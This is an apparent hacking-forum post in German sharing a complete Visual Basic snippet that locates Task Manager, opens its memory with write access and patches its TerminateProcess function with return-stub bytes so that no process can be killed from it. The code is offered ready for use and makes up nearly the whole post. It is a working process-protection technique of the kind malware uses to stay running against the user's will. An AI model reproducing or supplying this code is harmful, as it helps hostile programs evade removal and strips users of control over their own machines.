[SNIPPET] Disable TerminateProcess

[K-Gee]

Hi,

Snippet damit ihr eure (ganzen) prozesse im Taskmanager vor killing schützen könnt.
Credits: opc0de & 0P3R4T0R

Code:

Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * 260
End Type

Private Const TH32CS_SNAPPROCESS = &H2
Private Const PROCESS_VM_READ = &H10
Private Const PROCESS_VM_WRITE = &H20
Private Const PROCESS_VM_OPERATION = &H8

Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private  Declare Function OpenProcess Lib "Kernel32.dll" (ByVal  dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId  As Long) As Long
Private Declare Function WriteProcessMemory Lib  "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As  Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Sub Form_Load()
FuckTerminateProcess
End Sub

Function GetTaskMgrPID() As Long
Dim PE32 As PROCESSENTRY32
Dim hSnap As Long

PE32.dwSize = Len(PE32)

hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
Process32First hSnap, PE32

Do
If RemoveNull(UCase(PE32.szExeFile)) = "TASKMGR.EXE" Then GetTaskMgrPID = PE32.th32ProcessID
Loop Until Process32Next(hSnap, PE32) = 0

End Function

Function RemoveNull(ByVal eStr As String) As String
If InStr(1, eStr, Chr(0)) Then
    RemoveNull = Left(eStr, InStr(eStr, Chr(0)) - 1)
Else
    RemoveNull = eStr
End If
End Function

Sub FuckTerminateProcess()
Dim task As Long
Dim term As Long
Dim Ret(7) As Byte
Dim written As Long

Ret(0) = 89
Ret(1) = 88
Ret(2) = 88
Ret(3) = 51
Ret(4) = 192
Ret(5) = 81
Ret(6) = 195
Ret(7) = 90

task = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_WRITE Or PROCESS_VM_READ, 0&, GetTaskMgrPID)
If task = 0 Then MsgBox "Task Manager Not Open": Exit Sub

term = GetProcAddress(GetModuleHandle("kernel32"), "TerminateProcess")
WriteProcessMemory task, ByVal term, Ret(0), UBound(Ret), written

If Not written = 0 Then
    MsgBox "Success"
Else: MsgBox "Failure"
End If
End Sub